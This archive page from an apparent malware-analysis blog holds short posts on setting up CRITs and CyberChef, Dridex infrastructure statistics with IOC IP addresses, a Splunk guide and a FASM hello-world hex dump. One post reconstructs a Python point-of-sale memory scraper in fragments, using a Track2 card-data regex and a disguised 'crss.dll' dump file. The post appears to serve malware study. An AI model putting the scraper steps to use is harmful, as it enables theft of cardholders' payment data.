January 2017 – Reverse Engineering, Malware Deep Insight

Let’s Learn: Mitre’s Crits Threat Intelligence Platform in Docker

Source: https://crits.github.io/
Requirements: Docker, MongoDB
Docker Image: https://hub.docker.com/r/remnux/crits/

I. Install the Crits Threat Intelligence Platform (TIP) image via Kitematic;

II. Verify the container status via Kitematic panel

III. Browse to the local panel that is setup by default on port 8443; and

III. Login using the default credentials

Adendum: Additional Debug Information:

2017-01-17 07:15:17,244 CRIT Set uid to user 999

2017-01-17 07:15:17,307 INFO RPC interface ‘supervisor’ initialized

2017-01-17 07:15:17,309 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking

2017-01-17 07:15:17,309 INFO supervisord started with pid 5

2017-01-17 07:15:18,317 INFO spawned: ‘mongod’ with pid 9

2017-01-17 07:15:18,320 INFO spawned: ‘apache2’ with pid 10

2017-01-17 07:15:19,522 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:15:19,523 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

about to fork child process, waiting until server is ready for connections.

forked process: 86

ERROR: child process failed, exited with error number 48

2017-01-17 07:18:00,443 CRIT Set uid to user 999

Unlinking stale socket /data/run/supervisor.sock

2017-01-17 07:18:01,161 INFO RPC interface ‘supervisor’ initialized

2017-01-17 07:18:01,177 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking

2017-01-17 07:18:01,216 INFO supervisord started with pid 5

2017-01-17 07:18:02,264 INFO spawned: ‘mongod’ with pid 9

2017-01-17 07:18:02,310 INFO spawned: ‘apache2’ with pid 10

2017-01-17 07:18:03,304 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:18:03,439 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:18:03,498 INFO exited: apache2 (exit status 0; expected)

about to fork child process, waiting until server is ready for connections.

forked process: 16

ERROR: child process failed, exited with error number 100

2017-01-17 07:19:03,085 CRIT Set uid to user 999

Unlinking stale socket /data/run/supervisor.sock

about to fork child process, waiting until server is ready for connections.

forked process: 12

2017-01-17 07:19:04,273 INFO RPC interface ‘supervisor’ initialized

2017-01-17 07:19:04,284 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking

2017-01-17 07:19:04,336 INFO supervisord started with pid 5

2017-01-17 07:19:05,373 INFO spawned: ‘mongod’ with pid 15

2017-01-17 07:19:05,429 INFO spawned: ‘apache2’ with pid 16

2017-01-17 07:19:06,378 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:19:06,379 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:19:07,262 INFO spawned: ‘mongod’ with pid 19

2017-01-17 07:19:07,344 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:19:07,459 INFO exited: apache2 (exit status 0; expected)

2017-01-17 07:19:07,927 INFO spawned: ‘apache2’ with pid 22

2017-01-17 07:19:08,031 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:19:08,780 INFO exited: apache2 (exit status 0; not expected)

2017-01-17 07:19:09,879 INFO spawned: ‘mongod’ with pid 23

2017-01-17 07:19:09,892 INFO spawned: ‘apache2’ with pid 24

2017-01-17 07:19:10,579 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:19:10,997 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:19:11,034 INFO exited: apache2 (exit status 0; expected)

2017-01-17 07:19:12,058 INFO spawned: ‘apache2’ with pid 28

2017-01-17 07:19:12,669 INFO spawned: ‘mongod’ with pid 29

2017-01-17 07:19:12,757 INFO exited: apache2 (exit status 0; not expected)

2017-01-17 07:19:13,057 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:19:14,187 INFO spawned: ‘apache2’ with pid 32

child process started successfully, parent exiting

2017-01-17 07:19:15,672 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:19:16,678 INFO spawned: ‘mongod’ with pid 106

2017-01-17 07:19:17,108 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:19:18,115 INFO gave up: mongod entered FATAL state, too many start retries too quickly

Drop protection enabled. Will not drop existing content!

User Roles: added 3 roles!

Actions: added 2 actions!

Raw Data Types: added 2 types!

Signature Types: added 3 types!

Drop protection does not apply to effective TLDs

2017-01-17 07:20:59,999 CRIT Set uid to user 999

Unlinking stale socket /data/run/supervisor.sock

2017-01-17 07:21:00,999 INFO RPC interface ‘supervisor’ initialized

2017-01-17 07:21:01,002 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking

2017-01-17 07:21:01,002 INFO supervisord started with pid 5

about to fork child process, waiting until server is ready for connections.

forked process: 12

2017-01-17 07:21:02,120 INFO spawned: ‘mongod’ with pid 15

2017-01-17 07:21:02,182 INFO spawned: ‘apache2’ with pid 16

2017-01-17 07:21:03,003 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:03,940 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:21:05,182 INFO spawned: ‘mongod’ with pid 21

2017-01-17 07:21:06,356 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:21:06,700 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:07,710 INFO spawned: ‘mongod’ with pid 79

2017-01-17 07:21:08,446 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:09,954 INFO spawned: ‘mongod’ with pid 82

2017-01-17 07:21:10,461 INFO exited: mongod (exit status 100; not expected)

child process started successfully, parent exiting

2017-01-17 07:21:12,476 INFO spawned: ‘mongod’ with pid 100

2017-01-17 07:21:13,709 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)

2017-01-17 07:21:13,838 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:14,939 INFO spawned: ‘mongod’ with pid 105

2017-01-17 07:21:15,292 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:16,333 INFO spawned: ‘mongod’ with pid 118

2017-01-17 07:21:16,636 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:18,797 INFO spawned: ‘mongod’ with pid 121

2017-01-17 07:21:19,256 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:22,270 INFO spawned: ‘mongod’ with pid 127

2017-01-17 07:21:22,537 INFO exited: mongod (exit status 100; not expected)

2017-01-17 07:21:23,549 INFO gave up: mongod entered FATAL state, too many start retries too quickly

Drop protection enabled. Will not drop existing content!

User Roles: existing documents detected. skipping!

Actions: existing documents detected. skipping!

Raw Data Types: existing documents detected. skipping!

Signature Types: existing documents detected. skipping!

Drop protection does not apply to effective TLDs

Effective TLDs: added 7789 TLDs!

Drop protection does not apply to location objects

Added 248 Location Objects.

Default Dashboard Created.

Creating a new CRITs configuration.

Creating indexes (duplicates will be ignored automatically)

User ‘nonroot’ created successfully!

Temp password:

A CRITs configuration already exists. Skipping default creation.

Setting [allowed_hosts] to a value of [[‘localhost’]]

Saving CRITs configuration.

To access CRITS user interface, go https://localhost:8443 and use the following credentials:

Username: nonroot

Password:

Please change the temporary password upon successful login to the web interface by clicking on ‘Nonroot User’ near the top left panel and selecting ‘Change Password’.

If changes made to the CRITs application require a restart of the web server, run ‘service apache2 stop’ and supervisor will automatically restart the web server for you.

Dridex Banker Statistics 2016-2017

Source: OSINT

Goal: Obtain statistics related to Dridex trends in 2016, including, but not limited to,

(1) a count of all known Dridex nodes
(2) top 10 country infrastructure locations; and
(3) timeline histogram of node Dridex detections

Tool: Elasticsearch, Kibana, and Logstash (ELK)

Date Range: 2016-2017

Statistics:
(1) Dridex Count: 329
(2) Top 10 Country Infrastructure Location

geoip.country_name.keyword: Descending	Count
United States	77
Germany	34
United Kingdom	28
France	17
Canada	10
Netherlands	9
Australia	8
Russia	8
Thailand	8
Bulgaria	7

(3) Timeline Histogram

Detection Time	IOC	geoip.country_name
December 26th 2016; 20:07:34	92.222.129.145	France
December 26th 2016; 20:07:34	91.103.2.132	Ireland
December 23rd 2016; 12:35:14	82.196.5.27	Netherlands
December 22nd 2016; 07:27:36	192.188.58.163	Ecuador
December 22nd 2016; 07:27:36	203.153.165.21	Thailand
December 22nd 2016; 07:27:36	109.74.9.119	Sweden
December 22nd 2016; 07:27:36	69.43.168.214	United States
December 17th 2016; 11:27:38	71.6.155.196	United States
December 17th 2016; 11:27:38	188.68.50.34	Germany
December 15th 2016; 08:55:30	212.200.111.170	Serbia
December 12th 2016; 08:21:30	192.241.236.239	United States
December 9th 2016; 05:23:36	188.120.249.30	Russia
November 21st 2016; 06:34:36	72.249.144.95	United States
November 18th 2016; 13:35:55	188.126.72.179	Sweden
November 18th 2016; 05:55:13	174.37.216.226	United States
November 18th 2016; 05:55:13	166.78.144.68	United States
November 16th 2016; 13:54:38	54.235.86.173	United States
November 15th 2016; 09:53:22	193.136.97.4	Portugal
November 15th 2016; 09:53:22	93.122.165.54	Romania
November 11th 2016; 09:09:04	87.254.45.29	Norway
November 11th 2016; 09:09:04	149.210.158.54	Netherlands
November 5th 2016; 17:01:33	216.127.161.5	United States
November 4th 2016; 04:51:51	77.111.90.85	Hungary

Splunk: Threat Intelligence Data Import & Analysis

Source: Splunk

Goal: Create a quick reference guide on how to utilize Splunk for targeted data threat intelligence analysis and visualization.

Steps:

(1) Install Splunk and launch it locally;

(2) Add data into the Splunk knowledge base; and

(3) Use the imported threat intelligence data for targeted visualizations and pattern analysis.

Point-of-Sale Malware Instrumentation Analysis: Memory Scraper in Python

Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze Python memory scanning point-of-sale (PoS) malware for credit card data

Analysis Steps:
(1) Display the Windows version and the current architecture

from winappdbg import *

System.os, System.arch, System.bits

(2) Create a snapshot of running processes

System.request_debug_privileges(), System.scan_processes()

(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%

System.request_debug_privileges(), System.scan_processes()

dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')

(5) Obtain all processes that match the requested filenames:

(6) Get a memory map of the process

memoryMap  = process.get_memory_map()

mappedFilenames = process.get_mapped_filenames(memoryMap)

(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type:
(8) Read the data from memory

if mbi.has_content() and mbi.State == win32.MEM_COMMIT

(9) Implement a simple Regular Expression looking for Track2 data

dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)

dump_data.append(dump_regex)

(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry

import _winreg
hKey = CreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")subKey = SetValueEx( hKey, "Test", 0, REG_BINARY, "666" )


Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2

Let’s Learn: Installing CyberChef, a Swiss Army Researcher Knife

Source #1: https://hub.docker.com/r/remnux/cyberchef/
Source #2: https://github.com/gchq/CyberChef
Steps:

Using Docker, install and run it via “sudo docker run -d -p 8080:80 remnux/cyberchef“, or download and install it via Kitematic
Navigate to http://localhost:

According to its GitHub markdown page, the tool contains the following features [1]:

Drag and drop
- Operations can be dragged in and out of the recipe list, or reorganised.
- Files can be dragged over the input box to load them directly.
Auto Bake
- Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
- This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
- If any bake takes longer than 200 milliseconds, auto bake will be switched off automatically to prevent further performance issues.
Breakpoints
- You can set breakpoints on any operation in your recipe to pause execution before running it.
- You can also step through the recipe one operation at a time to see what the data looks like at each stage.
Save and load recipes
- If you come up with an awesome recipe that you know you’ll want to use again, just click save and add it to your local storage. It’ll be waiting for you next time you visit CyberChef.
- You can also copy a URL which includes your recipe and input which can be shared with others.
Search
- If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
Highlighting
- When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively (example: highlight the word ‘question’ in the input to see where it appears in the output).
Save to file and load from file
- You can save the output to a file at any time or load a file by dragging and dropping it into the input field (note that files larger than about 500kb may cause your browser to hang or even crash due to the way that browsers handle large amounts of textual data).
CyberChef is entirely client-side
- It should be noted that none of your input or recipe configuration is ever sent to the CyberChef web server – all processing is carried out within your browser, on your own computer.
- Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your desktop.

FASM: Portable Executable Review

Source: Izcellion

Goal: Advance and review FASM programming.

I. FASM compiled source code:

format PE GUI 4.0
entry start
include ‘%fasminc%\win32a.inc’
section ‘.data’ data readable writeable
msgText db ‘Message Text’,0
msgCaption db ‘Message Caption’,0
section ‘.code’ code readable executable
start:
invoke MessageBox,HWND_DESKTOP,msgText,msgCaption,MB_OK + MB_ICONINFORMATION
invoke ExitProcess,0
section ‘.idata’ import data readable
library KERNEL32, ‘KERNEL32.DLL’,\
USER32, ‘USER32.DLL’
import KERNEL32,\
ExitProcess, ‘ExitProcess’
import USER32,\
MessageBox, ‘MessageBoxA’

II. Same code complied from hex into ASM readable.

db 4Dh, 5Ah, 80h, 00h, 01h, 00h, 00h, 00h, 04h, 00h, 10h, 00h, 0FFh, 0FFh, 00h, 00h
   db 40h, 01h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 80h, 00h, 00h, 00h
   db 0Eh, 1Fh, 0BAh, 0Eh, 00h, 0B4h, 09h, 0CDh, 21h, 0B8h, 01h, 4Ch, 0CDh, 21h, 54h, 68h
   db 69h, 73h, 20h, 70h, 72h, 6Fh, 67h, 72h, 61h, 6Dh, 20h, 63h, 61h, 6Eh, 6Eh, 6Fh
   db 74h, 20h, 62h, 65h, 20h, 72h, 75h, 6Eh, 20h, 69h, 6Eh, 20h, 44h, 4Fh, 53h, 20h
   db 6Dh, 6Fh, 64h, 65h, 2Eh, 0Dh, 0Ah, 24h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 50h, 45h, 00h, 00h, 4Ch, 01h, 03h, 00h, 3Fh, 65h, 0ECh, 58h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 0E0h, 00h, 0Fh, 01h, 0Bh, 01h, 01h, 47h, 00h, 02h, 00h, 00h
   db 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 20h, 00h, 00h, 00h, 20h, 00h, 00h
   db 00h, 10h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h
   db 01h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 40h, 00h, 00h, 00h, 02h, 00h, 00h, 2Ch, 67h, 00h, 00h, 02h, 00h, 00h, 00h
   db 00h, 10h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 01h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 30h, 00h, 00h, 96h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 2Eh, 64h, 61h, 74h, 61h, 00h, 00h, 00h
   db 1Dh, 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 02h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 0C0h
   db 2Eh, 63h, 6Fh, 64h, 65h, 00h, 00h, 00h, 1Ch, 00h, 00h, 00h, 00h, 20h, 00h, 00h
   db 00h, 02h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 20h, 00h, 00h, 60h, 2Eh, 69h, 64h, 61h, 74h, 61h, 00h, 00h
   db 96h, 00h, 00h, 00h, 00h, 30h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 06h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 40h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 4Dh, 65h, 73h, 73h, 61h, 67h, 65h, 20h, 54h, 65h, 78h, 74h, 00h, 4Dh, 65h, 73h
   db 73h, 61h, 67h, 65h, 20h, 43h, 61h, 70h, 74h, 69h, 6Fh, 6Eh, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 6Ah, 40h, 68h, 0Dh, 10h, 40h, 00h, 68h, 00h, 10h, 40h, 00h, 6Ah, 00h, 0FFh, 15h
   db 80h, 30h, 40h, 00h, 6Ah, 00h, 0FFh, 15h, 60h, 30h, 40h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 58h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 3Ch, 30h, 00h, 00h
   db 60h, 30h, 00h, 00h, 78h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 4Ah, 30h, 00h, 00h, 80h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Bh, 45h, 52h, 4Eh
   db 45h, 4Ch, 33h, 32h, 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 55h, 53h, 45h, 52h, 33h, 32h
   db 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 00h, 00h, 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
   db 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 45h, 78h, 69h, 74h, 50h, 72h
   db 6Fh, 63h, 65h, 73h, 73h, 00h, 00h, 00h, 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
   db 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Dh, 65h, 73h, 73h, 61h, 67h
   db 65h, 42h, 6Fh, 78h, 41h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
